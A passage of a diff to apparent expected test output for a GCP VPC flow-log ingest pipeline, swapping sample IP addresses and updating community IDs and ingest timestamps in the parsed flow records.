ample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392205Z", + "original": "{\"insertId\":\"19im82tfdygzns\",\"jsonPayload\":{\"bytes_sent\":\"74370\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49438,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"580\",\"reporter\":\"SRC\",\"rtt_msec\":\"114\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.398463104Z", "end": "2019-06-14T03:49:56.220725956Z", @@ -18646,18 +18646,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 138337, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 244 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0T9pXVTCUZ37bK4xUSfPnYkUcHk=", + "community_id": "1:B/prlGvm/LDkdDcuN85b0JOuzto=", "bytes": 138337, "name": "default", "transport": "tcp", @@ -18679,7 +18679,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -18716,8 +18716,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869110300Z", - "original": "{\"insertId\":\"19im82tfdygznp\",\"jsonPayload\":{\"bytes_sent\":\"138337\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392210600Z", + "original": "{\"insertId\":\"19im82tfdygznp\",\"jsonPayload\":{\"bytes_sent\":\"138337\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -18738,10 +18738,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60110, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -18755,7 +18755,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:KL7wHxQCZ0qbnYIzbI2WPJd+SRw=", + "community_id": "1:GfC7CyOdz/yJsL4pM9oUUVW8XIE=", "bytes": 30062, "name": "default", "transport": "tcp", @@ -18778,7 +18778,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { @@ -18814,8 +18814,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869113Z", - "original": "{\"insertId\":\"19im82tfdygzo9\",\"jsonPayload\":{\"bytes_sent\":\"30062\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60110,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"124\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392216100Z", + "original": "{\"insertId\":\"19im82tfdygzo9\",\"jsonPayload\":{\"bytes_sent\":\"30062\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60110,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"124\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", "end": "2019-06-14T03:49:46.020466750Z", @@ -18836,9 +18836,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51348, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -18852,7 +18852,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:B8rl49fY7/3p7swViLnHkXbZpvs=", + "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -18867,7 +18867,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -18891,8 +18891,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869115900Z", - "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392221900Z", + "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:41:20.630975303Z", "end": "2019-06-14T03:41:20.754300982Z", @@ -18913,10 +18913,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33560, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -18930,7 +18930,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:oxwQ2yjTxzJgTjy4DOGjIjbTugc=", + "community_id": "1:rl6P/BkNpx5wKW4KChF0WRwBicw=", "bytes": 152218, "name": "default", "transport": "tcp", @@ -18953,7 +18953,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -18989,8 +18989,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869118800Z", - "original": "{\"insertId\":\"19im82tfdygznz\",\"jsonPayload\":{\"bytes_sent\":\"152218\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392232200Z", + "original": "{\"insertId\":\"19im82tfdygznz\",\"jsonPayload\":{\"bytes_sent\":\"152218\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", "end": "2019-06-14T03:49:59.565026127Z", @@ -19011,10 +19011,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33510, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -19028,7 +19028,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5M4qP42kXGLdSXH7/5CyFYlf2ys=", + "community_id": "1:nWbhgl2QeUsTpuyKkNHw2IVKrBE=", "bytes": 143085, "name": "default", "transport": "tcp", @@ -19051,7 +19051,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -19087,8 +19087,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869121700Z", - "original": "{\"insertId\":\"19im82tfdygzo4\",\"jsonPayload\":{\"bytes_sent\":\"143085\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392238Z", + "original": "{\"insertId\":\"19im82tfdygzo4\",\"jsonPayload\":{\"bytes_sent\":\"143085\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", "end": "2019-06-14T03:49:59.565078274Z", @@ -19115,18 +19115,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33510, "bytes": 61245, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 356 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5M4qP42kXGLdSXH7/5CyFYlf2ys=", + "community_id": "1:nWbhgl2QeUsTpuyKkNHw2IVKrBE=", "bytes": 61245, "name": "default", "transport": "tcp", @@ -19148,7 +19148,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -19185,8 +19185,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869124500Z", - "original": "{\"insertId\":\"19im82tfdygznt\",\"jsonPayload\":{\"bytes_sent\":\"61245\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392243800Z", + "original": "{\"insertId\":\"19im82tfdygznt\",\"jsonPayload\":{\"bytes_sent\":\"61245\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", "end": "2019-06-14T03:49:59.565078274Z", @@ -19213,18 +19213,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33532, "bytes": 65919, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 361 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Es6n9v5EcaaEvnW+j5pfFK2BgWc=", + "community_id": "1:O9TYQRXp+xFyW519UWDWFeTm/HY=", "bytes": 65919, "name": "default", "transport": "tcp", @@ -19246,7 +19246,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -19283,8 +19283,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869127900Z", - "original": "{\"insertId\":\"19im82tfdygznu\",\"jsonPayload\":{\"bytes_sent\":\"65919\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392247100Z", + "original": "{\"insertId\":\"19im82tfdygznu\",\"jsonPayload\":{\"bytes_sent\":\"65919\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -19307,9 +19307,9 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41822, - "ip": "198.51.100.182" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -19323,7 +19323,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:d5LNFArWcoFOBS9SH59qLdZmfEw=", + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -19338,7 +19338,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.182" + "67.43.156.14" ] }, "gcp": { @@ -19362,8 +19362,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869131100Z", - "original": "{\"insertId\":\"19im82tfdygzo6\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"198.51.100.182\",\"dest_port\":41822,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:40.058368408Z\",\"packets_sent\":\"4\",\"reporter\":\"SRC\",\"rtt_msec\":\"1439\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\